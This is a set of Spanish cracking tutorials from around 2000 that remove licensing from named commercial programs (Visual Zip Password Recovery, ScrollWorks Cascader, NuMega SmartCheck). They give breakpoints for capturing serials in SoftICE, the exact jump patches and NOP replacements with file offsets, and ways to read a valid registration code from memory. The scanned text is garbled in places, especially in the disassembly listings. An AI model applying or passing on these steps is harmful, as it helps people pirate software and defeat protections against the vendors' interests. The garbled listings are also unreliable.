despues de insertar los datos en la ventana de registro nos vamos al SOFT-ICE pulsando CTRL-D Y aparece la 
ventana de edicion del SOFT-ICE despues insertamos un breakpoint recordemos que existen muchos tipos de 
breakpoints desde ahora los llamaremos (bpx) ok!! 


entonces probamos con bpx (MESSAGEA), 


bueno continuemos volvemos a pulsar CTRL-D y regresamos al programa inmediatamente damos click en OK! 
y es ahi donde empieza la emocion, pero rayos!! que PASOOOO !!!! POR LA SANTA GLORIA DEL NIÑO DE 
ATOTOCHE !!!! no salio nada de nada me lleva la que metrajo que sera !!! bueno probemos con otro bpx. a ver 
mmmmmmmm!!! :) cual sera bueno, (RECUERDEN QUE NO SOY UN EXPERTO PARA SABER CUAL ES 
El BPX CORRECTO A PONER) osea que probemos con otro sale !! a ver si ponemos un bpx getdlgitemtexta, 
PROBEMOS.. 


insertamos bpx getdlgitemtexta pulsamos CTRL-D y saltamos al screen loupe y damos click en ok! y voila!!! ahora si 
saltamos directamente al SOFT-ICE,. 


User32! Getdlgitemtexta 

015F:BFF51743 MOV CL,A1 

WHAT'S THIS!!! es la primera referencia a el bpx getdlgitemtexta ahorita estamos en la refencia a el User32.dll 
ahora pulsamos f12 para saber quien mando hacer la llamada y nos manda a : 

015F:0040e7fb CALL [USER32! Getdlgitemtexta-] 

015f:0040e801 POP EDI 

015D:0040e802 POP ESI AQUI CAPTURA EL USER NAME 


AERAAKAA KK A KKK KK KK KK 


en este paso vemos que el SOFT-ICE nos a capturado el nombre del User Name lo podremos ver y comprobrar esto 


ProOfEsoOr X.... 
TECLEAMOS F12 otra vez..... 


volvemos a teclear F12 Y en este paso vemos que el SOFT-ICE nos a capturado el nombre de la Organization, lo 
podremos ver y comprobrar esto si en la pantalla del SOFT-ICE ponemos D ESI en la ventana de caracteres 


volvemos a teclear F12 Y en este paso vemos que el SOFT-ICE nos a capturado el numero de registro, lo podremos 
ver y comprobrar esto si en la pantalla del SOFT-ICE ponemos D ESI en la ventana de caracteres aparecera 0000:0000 


bueno esto parece que ya se cocio hemos visto que nos capturo ya los datos que insertamos ahora solo nos falta 
buscar a donde compara el numero que insertamos con el que genera la aplicacion, podemos usar dos metodos 
tecleando F10 o F8 pero F10 seria el mas indicado ya que con este no entramos a ninguna llamada hecha por el 
programa en cambio si usamos el F8 entrariamos a todas las llamadas que haga el programa y se nos haria un 
chorizo de instrucciones que para que les cuento ,,,,;) 


damos F10 varias veces hasta que encontramos una comparacion sospechosa 
despues de varios F10 nos encontramos esto: 

015F:00406685 add esp,08 

015F:00406688 cmp ebx,eax 


veamos si aqui es donde se compara nuestro numero falso con el generado por el programa que es el que 
corresponde a nuestros datos. VEAMOS!!!! ponemos la siguiente intruccion: 


? EBX = 111111 el nuestro 


parece que si es la comparacion apuntemos esos numeritos magicos y damos F12 para terminar la ejecución del 
programa y vamos he insertamos el numero magico y **?*"""""HNIVOILA!! programa registrado 


pues es todo por el momento, espero que les guste, y recuerden espero comentarios , sugerencia y criticas , NOTA: 
espero que me entiendan mi explicacion, y disculpas por los horrores ortograficos, cualquier duda haganmelo saber 
sale!!!! ya que su apoyo he interes sera el aliciente para continuar escribiendo mas tutoriales. 


NOTA: espero que entiendan mi explicacion, y disculpas por los horrores 
ortograficos, cualquier duda haganmelo saber sale!!!! 


profesor_x(Ohotmail.com 


Karpoff Spanish Tutor 


Programa: Visual Zip Password recorvery processor 
multicomputer V4.0 Final Win9x/NT/2000 


PROTECCION: | Molesta Nag cada 10.000.000 de password comprobadas y luego cada 10.000 

Deseripeisas Programa para sacar las password de los zip, exe protegidos, permite usar varias computadoras 
asi como el uso de diccionarios y otros metodos. 

Dificultad: Facilon 

DOWNLOAD: http://ftechsoft.hypermart.net 


Herramientas: W32Dasm , Softice o TRW2000 , Editor Hex y Apis32 


CRACKER: karpoff | FECHA: 


24/04/2000 


INTRODUCCION 


Tutorial de Crackeo Para Newbies desde Cero HH PROYECTO 17 4H 


Hola Gentes !! despues de un par de meses sin escribir nada hoy me apetece y por 
peticion de un amigo me dispongo a darle un repasillo al Visual zip password, los que 
habeis seguido mis manuales sabreis que ya nos enfrentamos a este programa en su 
version 3.12, ahora estamos en la v4 y no tiene nada que ver :-), si recordais la 
version 3.12 estaba comprimida, protegida contra debugger y desensablado y estaba 
limitada a no poder buscar password mayores de 5 digitos en esa ocasion hicimos un 
loader. Ahora veamos que nos cuenta la version 4. 


AL ATAKE 


Como siempre fundamental prepararnos el terreno para tener todo a mano, hacemos una copia de 
VZprp.exe con el nombre cvzpre.exe y cargamos nuestro debugger softice o TRW2000 (da igual), 
ahora nos haremos con toda la informacion posible sobre la victima, existen muchos programas 


que nos dan informacion sobre el encabezado PE y el compilado de la victima yo uso el File 
Analicer, solo tenemos que pinchar con el mousse una copia de la victima osea cVzprp.exe y 


arrástrarla sobre fa.exe el resultado es: 


Image Flags(2) RelocatStrip(.) LineNumStriptx) LocSymbStrip(x) 
HeapStack Reserve: 00100000/00100000 
HeapStack Commit 00001000/00004000 
Data Sizes InitDataSize : 00050200, UninitDataSize 
Other Sizes(1) CodeSize 0008CC00, ImageSize 
Other Sizes(2) HeaderSize 00000400, OpHeaderSizetHD: OOOOONEN 
Bases BaselfCode : 00001000, BaselflData 0008E000 
Alignments FileAlignment: 00000200, SectionfAlignment: 00001000 
Objects table Hame VirtSize ERVA PhysSize PhysUOffs Flags 
Object 1) CODE 0008CB7C/|00001000/0008CC00|00000400/|60000020 
] 2) DATA 00001ED04|0008E£000/|00002000|0008D000|C0000040 
3) BSS 00006505 ¡000920000 |00000000|0008F000|¡C0000000 
4) .1data 000025€2/|00097000/00002600|0008F000|C0000040 
5) .tls 00000010|00094000/|00000000|00091600|¡C0000000 
6) .rdata 00000018|0009B8000/00000200|00091600|50000040 
D .reloc D000A1E0 |0002C000 00004200 ¡00091800 50000040 
( 8) .PSre 00041800|00047000/00041800|0009B400|50000040 
Processed with(1): 
DOSEXE part sizes: Header 64 bytes, image 528 bytes, overlay 205136 bytes 
WINEXE part sizes: Header 4032 bytes, image 201696 bytes, overlay Il bytes 
Entrypoint = DOS 64400000040, RUA 58025640008DA40, WIN 577184/0008CEA0 
Information(1) : Querlay start from 905728/0000D200 
Extension ( 13: DOS executable file 


00000000 
D00E9000 


A simple vista ya sabemos que vVzprp.exe no esta empakado y no esta protegido contra 
desensamblado, de estar protegido tendriamos en la seccion CODE, Flags un valor de C0000040 


(para mas informacion sobre encabezados PE leer los trabajos de nuMIT_or explica paso a paso y 


detalladamente todo lo que veis en la imagen.) 


Bueno ya sabemos algunas cosillas, no tendremos ningun problema a la hora de desensamblarlo 
(por lo general) ahora debemos averiguar que limitaciones tiene la victima, solo con leer en la 
ayuda del programa su autor nos dice ya cuales son las restricciones que segun dice son: un 
horrible NagScreen cada 1.000.000 de password en modo brute force y en otros modos Cada 100.000 
password, por si acaso lo comprobamos no valla ha ser que sea un pequeño engaño para 
despistarnos a la hora de crackearlo, y bueno yo por mas pruebas que hago me escupe el nag Cada 
10.000.000 de password en brute force y cada 10.000 password en otros modos Mnnnn que 


mariconcete jeje. 


Como atacamos a este programa?? aparentemente no parece que sea muy dificil no esta comprimido, 
no tiene proteccion antidasm y tampoco antidebugger (lo se, por que tengo el Softice cargado y 
puedo ejecutar la victima sin ningun problema)asi que veamos si encontramos en las String Ref 
algo interesante, procedamos a desensamblarlo con W32Dasm, ya esta ?? pues guardalo como 
proyecto para no tener que desensamblarlo de nuevo, pulsamos sobre [String-Ref] y no veo nada 
interesante, vaya putada, se me ocurre tracearlo con Apis32 , este programa da mucha 
informacion y suele ahorrar mucho trabajo. Ya os habreis dado cuenta de que nuestra victima nos 
da la opcion de registrarnos mediante el tipico Name / Serial, asi que igual guarda en el 
registro de Windows la informacion del registro si es asi Apis32 nos dara informacion sobre 
ello, ejecutamos Apis32 y cargamos vzprp.exe como lo que nos interesa es ver que hace en el 
registro de Windows borramos todas las apis que tengamos para monitorear en apis32 y metemos 
solo las que tienen que ver con el registro de Windows, que como lo hago ?? veamos un gif de 


Apis32: 


Follow API functions are spied 


| 
ADWAPI32: RegCloseKey [ HANDLE ] a Find | 
ADWAPI32: RegConnectRegistruá [ LPSTR, HANDLE, LPDATA ] | 
ADVAPI32: ReglonnectRegistrw' [ LPWSTA, HANDLE, LPDATA ] 122 


ADVAPI32 : RegCreateKeyá [| HANDLE, LPSTA, LPDATA ] 
ADVAPI32 : RegCreateKeyExá [ HANDLE, LPSTA, DWORD, LPSTR, DWORD, DWORD, | 
ADVAPI32 : RegCreateKeyw ( HANDLE, LPWSTR, LPDATA ] 

ADVAPI32: RegDeleteKeyá [ HANDLE, LPSTR ] 

ADVAPI32 : RegDeleteKeyw ( HANDLE, LPWSTR ] 

ADVAPI32 : RegDeleteValuea [ HANDLE, LPSTR ] 

ADVAPI32 : RegDeleteValuew [ HANDLE, LPWSTR ] | 
ADVAPI32 : RegEnumKeyA ( HANDLE, DWORD, LPSTR, DWORD ] Add | 
ADVAPI32: RegEnumKeyExá [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPSTA, Lt 

ADVAPI32 : RegEnumKeyw [ HANDLE, DWORD, LPW'STA, DWORD ] Del 
ADVAPI32 : RegEnumWValueá, [ HANDLE, DWORD, LPSTA, LPDATA, LPDATA, LPDATA, L = 
ADWAPI32: RegFlushKey [ HANDLE ] 

ADVAPI32 : ReqGetKeySecurity | HANDLE, DWORD, LPDATA, LPDATA ] zp PeLAl 


Aun Imports | Exit | ¿bout | 


Para borrar todas las apis que hay en la ventana pulsamos el boton Del all ya tenemos la 
ventana en blanco, sin ninguna api, ahora tenemos que meter las correspondientes al archivo 
Advapi32.dl1 que es el encargado de gestionar las apis basadas en el reg de Windows, pulsamos 
Add y nos dara a elegir entre algunos archivos.fnl seleccionamos advapi32.fn1 y pulsamos la 
opcion Add all y ya tenemos agregadas todas la apis, tambien podemos agregarlas de otra forma 
pulsamos la opcion Imports y veremos todas las apis que manejara nuestra victima podemos 
agregarlas una a una :) pero creo que es mas comoda la primera opcion, ahora pulsamos Run y 
veamos que ocurre cuando se este ejecutado vzprp.exe intentamos registrarnos mediante Help 
Register y nos escupe el mensaje de que los datos no son validos, ahora veamos la ventana del 
apis32 se aprecia claramente que solo toca el registro de Windows al iniciarse el programa asi 
que antes de cerrar nada pulsamos en save log para guardar los eventos creados hasta ahora, los 
demas no nos importan y cerramos todo el apis32 y vzprp.exe, ahora editemos el archivo 
vzprp.log que ha creado Apis32 en el directorio donde tenemos intalada la victima, entre todo 


lo que hay lo unico que me parece algo interesante es: 


joftuareForthTechWWZPRP", DHORD:00000000,LPSTR:00000000,DHORD:00000000,DHORD:000R 


"CheckBoxH in",LPDATA:00000000,LPDATA:0071FBFC,LPOATA: 00000000, LPOATA:00?1FC18) 
:"SpinEditSave",LPDATA:00000000,LPDATA:0071FBFC,LPOATA: 00000000, LPOATA:0071FC18) 


"SpinEdit: 
8:"LastProject",LPDATA:00000000,LPDATA:0071FBDC,LPDATA:00000000,LPDATA:0071FBFS) 


8:"LastProject",LPDATA:00000000,LPOATA:00?1FBF4,LPDATA:01178860,LPDATA:00?1FC04) 


joftuareForthTechWZPRP", DHORD:00000000,LPSTR:00000000,DHORO:00000000,DHORD:000F 


:"koy",LPDATA:00000000,LPDATA:00?1FBFC,LPDATA:00000000,LPOATA:0071FC18) 


son estas lineas que cuando el programa se inicia parece que chekea en el registro si estamos o 
no registrados, fijaros en esta ultima linea donde RegQueryValueExa Chekea "Key" el sitio dode 

podria estar la clave de registro si seriamos usuarios registrados como tenemos la direccion de 
memoria donde ocurre esto vallamos al W32dasm e intentemos modificar codigo para que reciba el 

valor contrario al que esta recibiendo de "Key" como se ve, la direccion de memoria es 0047522E 
veamos que encontramos en ella, y si os fijais es una direccion que se repite bastante en el 


log (igual sacamos algo interesante :)) bueno pues buscamos y encontramos: 


* Reference To: advapi32.RegQueryValueExA, Ord: 0000h 
l 

Call 00406740 

test eax, eax 

sete bl 


mov eax, 


:0047522E ESODISF9FF 
200475233 85Cc0 
200475235 0F94C3 


200475238 8B0424 dword ptr [esp] 


200475240 884500 mov byte ptr [ebp+00], al 
200475243 8BC3 mov eax, ebx 

200475245 5A pop edx 

200475246 5D pop ebp 

100475247 5F pop edi 

200475248 5E pop esi 

200475249 5B pop ebx 

:0047524A C3 ret 


aqui tenemos la api y su correspondiente codigo, la direccion que hemos buscado nos muestra una 


(call 00406740) pulsemos sobre [Call] y veamos que hace: 
advapi32.RegSetValueExA, Ord: 0000h 
| 


llamada 
* Reference To: 


:0040674E SBCO mov eax, eax 


Aqui lo no hace mas que saltar a un valor lejano y hacer algunas operaciones en advapi32.dll y 
retorna enseguida asi que vamos a ver que hace la siguiente llamada (call 00474fac) nos 


situamos encima y pulsamos sobre [Call] 


* Referenced by a CALL at Addresses: 
1:0047523B + 700475446 


:00474FAF 7503 
:00474FB1 BOOl 
:00474FB3 C3 


Aqui es donde podemos 
cmp eax,000001 pone a 
esa direccion y evita 
que pasa (aclaracion, 
podriamos atakar a el 
7503 je 00474fba para 


jne 00474FB4 
mov al, 0l 
ret 


manipular e invertir el valor de que recibe de "Key" en esta instrusión 
1 el flag con lo que hace que jne 00474fb4 se ejecute osea que salta a 
el retorno (ret) que le sigue, bueno pues invertimos el salto para ver 
este proceso no es mas que una valoracion para ver como y por donde 
programa) tenemos que cambiar 00474faf 7403 jne 00474fba por 00474faf 
hacerlo vamos a nuestro editor hexadecimal y mediante el offset de esa 


instruccion que es 743af localizamos la instruccion en valores hexadecimales “7503 B001 


cambiamos por 7403 B001 salvamos y probamos el resultado 
las hacemo en una copia de vzprp.zip) 


Unregistered version! 
System messages, 


es una buena señal probemos a hacer alguna prueba, 


(recordare que estas modificaciones 
redobleeeeee ejecucion y..... VaYA !! el mensaje de 

que canta nada mas ver el programa a desaparecido y en su lugar vemos 
pero ohh todo sigue igual, 


que coño hacemos ahora bueno de momento dejamos los cambios que hemos hecho por lo menos ya no 
Canta tanto el mensaje rojo ese y el programa funciona igual osea que algo hemos adelantado je 


hay que ser optimistas :). 


Cambiando la tactica, sabemos que cada 10.000.000 de password sale el Nag no? pues pasemos a 
hexadecimal ese numero y rastreemos en busca de la instruccion que que chekea el asunto, 
10.000.000 en Hexadecimal es = 989680 haber si tenemos suerte y encontramos coincidencias, 
metemos el numero en la opcion buscar (la linterna) Bien !! tenemos suerte y encontramos la 


primera, ademas tiene toda la pinta de estar hay para hacer esa comprobacion :) 


:00484DC7? 803800 
:00484DCA OFS5E5000000 
:00484DDO 600 


cmp byte ptr [eax], 00 
jne 00484EB5 
push 00000000 


:00484DD7? 8B0504644900 
:004384DDD 8B1508644900 


mov eax, dword ptr [00496404] 
mov edx, dword ptr [00426408] 


Y tenemos un bonito salto que si queremos la puede evitar jeje pues no se hable mas y adelante 
convirtamos ese condicional a un incondicional ousease jne por jmp el cambio a realizar (para 


los que no os empapais mucho todavia) 


:00484DCA 0F85E5000000 jne 00484EB5 por :00484DCA E9E6000000 3jmp 00484EB5 


Que como se que el valor E9E6000000 Corresponde a un salto incodicional a la mima direccion de 
memoria (00484EB5) que nuestro :00484DCA 0F85E5000000 jne 00484EB5 , bueno en Casi todos mis 
manuales lo explico asi que este por se el n*17 no lo explicare, si alguien tiene dudas que 
consulte los anteriores, creo que en Casi todos esta explicado. Bueno a lo que vamos metemos la 
direccion del offset 841CA en el editor hexadecimal y veremos 0F85 E500 0000 lo cambiamos por 
E9E6 0000 0090 Que que pinta ese 90 puesto hay?? pos muy facil tenemos que sustituir 6 bytes 
pero al cambiar el salto a un salto incondicional este solo se representa con 5 bytes entonces 
lo que hacemos es anular el sexto. Bueno una vez realizados los cambios probemos, hacemos una 
prueba y OK el Nag que escupia cada 10.000.000 de passwords ya no es un problema jeje. Ahora 
seria igual de facil localizar la rutina que chekea que salga el nag Cada 10.000 pasword, seria 
lo mismo pasar a hexadecima 10.000 (que son = 2710) y buscar las posibles coincidencias, pero 
ojo 2710 es una cifra que nos la vamos a encontrar muchas veces, por que la busqueda no va a 
mostrarnos solo las coincidencias de la instruccion relacionada, sino que nos va ha mostrar 
todas esto incluye direcciones de memoria etc. pero esto no es ningun problema ya que es bien 
facil distinguir cual es solo tenemos que descartar las que aparezcan en direcciones de memoria 
y buscar las que coincidan con el valor de una instruccion (push 00002710 o Mov xxx,00002710 
tc.) pero eso qu 1 valor sea exacto a 2710, bueno pues a partir de aqui si quieres puedes 


seguir por este camino o podemos cambiar la tactica e ir a por algo mas seguro, Me explico. 


Sabemos que cada cierto numero de comprobaciones saca un nag, nosotro hemos manipulado la 
instruccion que chekea la comprobacion de 10.000.000 de password, pero tiene que haber una 
instruccion encargada unicamente de que salga el nag y que se pueda modificar sin necesidad de 
que afecte a otras instrucciones, asi que busquemos esa instruccion y veamos de que va, sabemos 
que esa instruccion esta relacionada con el salto que hemos manipulado no?? pues solo tenemos 
que tracearla paso a paso con nuestro debugger y observar en que preciso momento lanza el nag, 


que os parece?? es por cambiar de tactica y aprender algo mas, pues al atake: 


Cargamos nuestro debugger preferido (softice o TRW2000) y seleccionamos vzprp.exe (pero qqu 
sea virgen, osea una copia sin manipular) la cargamos con el debugger y ponemos um break point 


en la direccion del salto manipulado osea 


:00484DCA0F85E5000000 jne 00484EB5 


BPX 00484dca [RETURN] 


Algunas obserbaciones: el primer nag saldra cunado chekee 10 millones de password con lo cual 
si ponemos el Break Point nada mas empezar a chekear password nos podemos morir hasta dar con 
la instruccion que lanza el nag ya que pasara por esa direccion de memoria 40.000 veces (por 
decir algo) entonces mejor de momento no ponemos el Brak Point y corremos Vzprp.exe desde el 
debugger, y y lo hacemos que testee cualquier zip protegido estamos atentos para cuando llegue 
a mas o menos 9.999.999 pasword comprobadas interumpimos el proceso pulsando [Ctrl + D] los 
que utilizais Softice o [Ctrl + N] los que ulilizamos TRW2000 y eso se trata de interrumpir el 
proceso lo mas cerca posible a 10 millones, yo lo he parado en 9.931.363 ahora es cuando 


ponemos el Brak Point a nuestro salto :00484DCA0F85E5000000 jne 00484EB5 


BPX 00484dca [RETURN] 


si os habeis quedado bastante alejados de 10.000.000 vamos pulsando F5 hasta que nos 
hacerquemos un poco, para saber cuanto os vais acercando pulsais F4 y mirais , pulsais 
nuevamente F4 y otra vez a softice, ahora vamos traceando con F10 hasta que salte el nag con 
tener pulsado F10 es suficiente (es para ir mas rapidos) y derrepente boom!! el nag atencion 
ahora pulsamos en OK y nos devuelve al softice justo debajo de la instruccion que ha sacado el 


nag que si todo os ha ido bien al pulsar OK aparecereis en: 


:00484E6A 8B45EC mov eaxX, dword ptr [ebp-14] 

:00484E6D 8B10 mov edx, dword ptr [eax] 

:00484E6F FF92D8000000 call dword ptr [edx+000000D8] Esta es la responsable del Nag 
:00484E75 83F802 cmp eax, 00000002 --— Aqui aparecemos al pulsar OK en el Nag 
:00484E78 750E jne 00484E88 


Bueno pues ya hemos localizado quien saca el maldito Nag ahora solo tenemos que eliminar esa 
instruccion (ah acordaros de borrar el break point del softice), para hacerlo localizamos el 
offset que es 8426f y vemos FF92 D800 0000 asi que para eliminar la instruccion lo sustituimos 
por 9090 9090 9090 salvamos los cambios y probamos, je hemos tenido exito ya no hay nag, ohhh 
pero ahora nos sale el de las 10.000 password, que quiere decir esto?? pues que posiblemente 
existan mas instrucciones iguales en otra parte del codigo pero buscarlas es bien sencillo solo 


tenemos que coger el valor hexadecimal de 


call dword ptr [edx+000000D8] que era FF92D8000000 y buscar todas las coincidencias en el 
W32dasm, pos vamos alla, y aparecen 16 coincidencias Mnnnn son muchas solo una de ellas 
seguramente es la que sacara el nag de las 10.000 pasword, Como sabemos cual es?? muy sencillo, 
apuntemos las direcciones de memoria en donde se encuentran todas las coincidencias en mi caso 


han sido en 


454239 
454515 
45CD26 
48310B 
483130 
484E6F 
485196 -- a este no hace falta poner un BP, ya lo hemos eliminado. 
487FC8 
48A829 
48BCB3 
48C035 
48C92D 
48CB40 
48D34F 
48D6A8 
48D744 


Ahora solo tenemos que poner unos Break Points a todas estas direcciones y correr el programa, 
cuando salga el nag se interrumpira el proceso y se parara en una de esas direcciones en la que 
se pare es la encargada de escupir el nag de las 10.000 password seguimos los mismos pasos que 
con el anterior y ya esta, tenemos el programa 100 x 100 funcional, jeje y con la primera 
operacion del registro de windows que hicimos al comienzo del manual hemos eliminado hasta el 


unrregistered version :-). 


Bueno espero que os sirva para ampliar algo vuestros conocimiento, he intentado dar a entender 
que siempre se pueden tomar varios Caminos mientras estamos crackeando un programa, se trata de 
ir valorando mientras lo trabajas y pensar en todas las posibilidades, yo siempre os recomiendo 
que no sigais siempre los mismos atakes intentar pensar e imaginar otras formas de atakar, este 


programa tiene muchas mas maneras de atakarle, como siempre es un placer escribir para vosot(ts 


Cualquier duda, critica, sugerencias 


Email 


Saludos a todos y especialmente a INT!,KUT ,WKT ,TUTORIAL LETAL ,KarlitoxZ ,Esiel2 y a todos 


los que me envias vuestros emails con dudas e ideas. 
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Programa: SCROLLWORKS CASCADER v 1.03 


PROTECCION: SERIAL NUMBER 


Descripcion: | TE PERMITE AÑADIR MENUS EN FORMA DE CASCADA 
Dificultad: PR 
DOWNLOAD : http://www.scrollworks.com 


Herramientas: Softice 3x+ 
CRACKER: PraiFesor X FECHA: 07/05/2000 


INTRODUCCION 


Bueno amigos otra vez por aquí con el tercer tutorial, espero les 
sea de utilidad ya que yo aprendí un poco mas con este 

programa, por cierto un saludo a todos los que me han escrito, 
empecemos, este programa es otro de los tantos que 

existen en internet que con solo unos cuantos pasos podremos 
encontrar un serial valido para poder registrarnos. 


AL ATAKE 


Para empezar necesitamos 
vez Cargado el soft-ice, 


reiniciar la P-cera para cargar el soft-ice 
instalemos el programa 


r 


uúna 


scrollworks cascader que desde este momento le llamare “SWC” ¡!! Bueno 
ejecutemos el programa y nos manda a la 
siguiente ventana ¡! 

E Cascader IP AX 


1] Select an item below to 
add to your start menu. 


2] Press Add to put the ¡ter 
in pour start menu. 


My Computer contains shortcuts 
to your Drives, Printers, Control 
Panel, Dial-Up Networking, and 
Scheduled Tasks. 


Vaya Vaya ¡!! 


Como verán 
demos clic en el boton llamado 
“REGISTER” y aparecemos aquí: 


Claro amigos ahora 


Register Scrollworks Cascader E3 
User name: REZTE 
Registration code: [1111111111] Cancel 


To obtain your registration code, please visit the Scrollworks web site. 


he insertamos un User name y Registration Code, 
aparece en la imagen, una vez insertado 
damos a clic en OK y nos aparece una ventana : 


en mi caso pondré como 


CASCADER 


y Y Invalid registration key. The Liser name or Registration code is not correct. 


como pueden ver es una típica messagebox bueno pues manos a la obra, a 
buscar un serial valido a ver piensen cual 
seria el siguiente paso ? mmmmmm. Ya bueno , 
aparecemos en el soft-ice y ponemos un 

bpx (breakpoint) , probemos con bpx getwindowtexta damos otra vez CONTROL 
D he insertamos los datos y 


pues damos CONTROL D y 


damos clic en OK y nos manda directamente al softice- “ vaya vaya si que 
tenemos suerte, le atinamos a la primera ” 
bueno ahora veamos el código mmmmmmm. Veamos ¡!!!!! 


llamada a getwindowtexta ------ 
USER32 ! GETWINDOWTEXTA 

0167: bff51804 mov cl,b2 

0168: bff511806 push ebp 


bueno entonces a ver demos f12 para que nos regrese a la parte del código 
que hizo la llamada a el bpx, y aparecemos 
en el siguiente codigo: 


0167: 00415290 mov ecx [ ebp/10 ] 
0167: 00415293 push ff 


bueno desde aquí nos vamos dando f10 hasta encontrar lo siguiente: 


0167: 00402c7a call 00402720 ------- llamada a la rutina de comprobación --— 


0167: 00402c7f add esp, Oc 


0167: 00402c82 test eax,eax 


0167: 00402c84 3z 00402d29 salto condicional si nuestro numero 
es falso = 0 


una vez encontradas esta rutas , damos D EBP y miramos nuestra ventana de 
datos del soft-ice y vemos lo siguiente: 


066f£: 0O065EED8 01 00 00 00 32 31 34 33 38 30 33 37 35 53 00 00 
e aaa 2143803755.. 


hey que es esto un numero extraño, que tal si lo apuntamos ya ¡!! Bueno 
ahora damos CONTROL D para terminar la 

ejecución del programa y quitamos todos los bpx con la instrucción BC*, y 
listo vamos a la ventana de registro e 

insertamos el numero que apuntamos y ¡!!!!!! 


bueno Ufffffffff!!! ;) creo que este arroz ya se cocio ¡!! , 


bueno amigos me despido, diciendo que la practica hace al maestro, UNA 
SALUDO A todos mis amigos: 


SKUATER (maestro saltamontes aquí esta el alumno pequeño saltamontes.... 


KARPOFF ( gran amigo y grandioso cracker) 
XASX (nuestro Presindente yea!!!) 
KARLITOXZ ( espectacular persona ) 


Matrix ( del grupo Kracker United Team 2000 Muy bUen Cracker ; ahí LA 
llevas Amigo ) 


y a todos los Miembros de TnT 


Tutor by: PrQfEsO0r X profesor _xfthotmail.com 
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Programa: Numega smartcheck V.603 


PROTECCION: Name / Serial, Limitacion de Tiempo. 

Descripcion: Debuger para programas en visual basic. 

Dificultad: Novato Avanzado. 

DOWNLOAD: http://karpoff.tsx.org 

Herramientas: Softice, W32dasm, Editor Hexadecimal 

CRACKER: Fanega. FECHA: 5/6/2000 


INTRODUCCION 


Hola a todos. Ante todo decir que soy nuevo en este arte, y que ha fecha de hoy hace solo dos semanas que 
empece ha leer tutoriales en la web de karpoff. Digo esto por si alguien mas experto lee este tutorial perdone 
los fallos que pudiera contener. 


Bueno a lo que vamos, con este programa veremos que cuando se nos complican las cosas, bien por que el 
programador nos quiere joder vivos, o por que nuestro conocimiento no da para mas, siempre tenemos otro 
camino para seguir adelante, o incluso cuando mas se empeñan en complicarnos las cosas nos las dan en 
bandeja. 


Este programa tiene limitacion de tiempo de 45 dias, como primera idea intentaremos hacerle funcionar con 
cualquier nombre y numero de serie. 


AL ATAKE 


Primero instalaremos el programa, durante la instalacion nos pedira nuestro nombre, el de nuestra 
compañia y el numero de serie. Pues metemos los nombres pero no el numero de serie, le damos a next y 
nos dice que si lo queremos instalar como version de demostracion y le decimos que si, el programa se 
instala perfectamente. 


Bueno vamos a probar este programita, ejucatamos smartcheck y se habre el programa pero no nos 
muestra ninguna pantallita de que estamos en el periodo de evaluacion, cargamos alguna aplicacion y le 
damos al boton start, lahora¡ ahora si que nos enseña una nag screeen informandonos de que nos quedan 
45 dias de evaluacion con tres botones (ok, cancel y purchase), le damos al purchase y nos enseña otra 
nag para que metamos nuestro nombre, nombre de compañia y codigo de desbloqueo, demosle lo que 
nos pide metemos un codigo y nombre al azar y pulsamos OK, y por fin lo que buscabamos el mensajito 
tipico de error YOU HAVE ENTERED AN INCORRECT CODE, esto debe ser algo asi como a mi no 
me chulees. 


Paso a seguir, si, si ya se lo que estais pensando nos vamos al w32dasm y buscamos esta cadena en el 
string ref, muy bien hacerlo yo ya lo he echo y no he visto ni torta, recordad que nos es necesario que las 
rutinas de proteccion esten en el ejecutable, ni que esten en otro archivo que este en el mismo directorio 
que smartcheck como veremos mas adelante. 


Regresemos donde estabamos con el mensaje de error habierto, y le damos a Ok para que se cierre. 
Habrimos el gran ojo que todo lo ve nuestro particular gran hermano, el gran SOFTICE, sabes como se 
hace no (ctrl+d), metamosle un breakpoint para cazar la nag del mensaje de error, empiezo a meterle los 
tipicos messageboxa, getwindowtexa etc. ¿pero que pasa? no me hacepta ninguno que es esto, tras un 
momento de paron neuralgico, me doy cuenta que al parecer estas rutinas de proteccion estan en modo 
de 16 bytes por eso no me aceptaba ningun breakpoint, sabeis de que hablo ¿no? en 32 bytes ponemos en 
los bpx la -a- al final y en modo 16 bytes no, pues metamos -bpx getwindowtext- cerramos el sice con 
FS. Estamos en la pantalla en la que tenemos que darle nuestros datos al smartchek, metemos los que 
queramos y pinchamos sobre OK y salta el sice, hemos acertado con el breakpoint sigamos, pulsamos FS 
hasta que salte el mensaje de error y vemos que salta a la tercera vez de pulsar FS, pues le damos a OK y 
repetimos todo el proceso cuando aparezca el sice pulsamos solo dos veces FS y paramos, vamos a ver 
quien nos a mandado aqui pulsamos F12 dos veces y aparecemos en tl132v20 que es el encargado de 
proteger nuestro programa. 


Nos fijamos en nuestro codigo: 


:10003EDO FF15DC630110 Call dword ptr [100163DC] 

:10003ED6 8D45D8 lea eax, dword ptr [ebp-28] 

:10003EDO9 50 push eax 

:10003EDA E885E9FFFF call 10002864 

:10003EDF 83C404 add esp, 00000004 

:10003EE2 8D45EC lea eax, dword ptr [ebp-14] 

:10003EE5 8D4DEC lea ecx, dword ptr [ebp-14] 

:10003EE8 50 push eax ------ lleva nuestro unlock code 

:10003EE9 51 push ecx ------ lleva el codigo bueno 

:10003EEA E891 170000 call 10005680 ----- rutina que compara los codigos 

:10003EEF 83C408 add esp, 00000008----------- aparecemos aqui 

:10003EF2 85CO0 test eax, eax 

:10003EF4 7553 jne 10003F49 -------- salta si has sido malo. 

:10003EF6 8D45EC lea eax, dword ptr [ebp-14] 

:10003EF9 50 push eax 

:10003EFA 6885450110 push 10014585 

aparecemos en 015f : 10003EEF despues de una llamada a una rutina que compara los codigos, la 
siguiente linea del codigo es una comprogacion del valor devuelto por esa llamada, y en 015f:1000EF4 
el salto nos manda al mensaje de error, tendremos que cambiarlo. Pero antes fijemonos un poco mas en 
el codigo,. arriba de la llamada a la comprobacion de los codigos tenemos un push eax y push ecx bueno 
pues si poneis en el sice - d eax - veremos el numero del codigo que habiamos metido, y si ponemos - d 
ecx - nos enseñara en la pantalla de datos del sice un numero largo que resulta que este es el bueno, 
¿como puede esta jente hacer esto? por una parte nos lo intentan complicar todo lo que pueden, y por la 


otra a la primera de cambio me entregan el codigo de desbloqueo en bandeja, para mi mejor je je. 


Ahora vosotros direis por que queremos calentarnos mas la cabeza si ya tenemos el numero guay, pues 
muy sencillo este programa cada vez que se instala crea un numero de serie diferente, a partir del cual 
genera el codigo de desbloqueo, por lo tanto este numero no valdria para nuestros amigos o si volvemos 
a instalarlo no nos serviria, mientras que si reventamos el programa y hacemos un parche si que puede 
valer para siempre a quedado claro. 

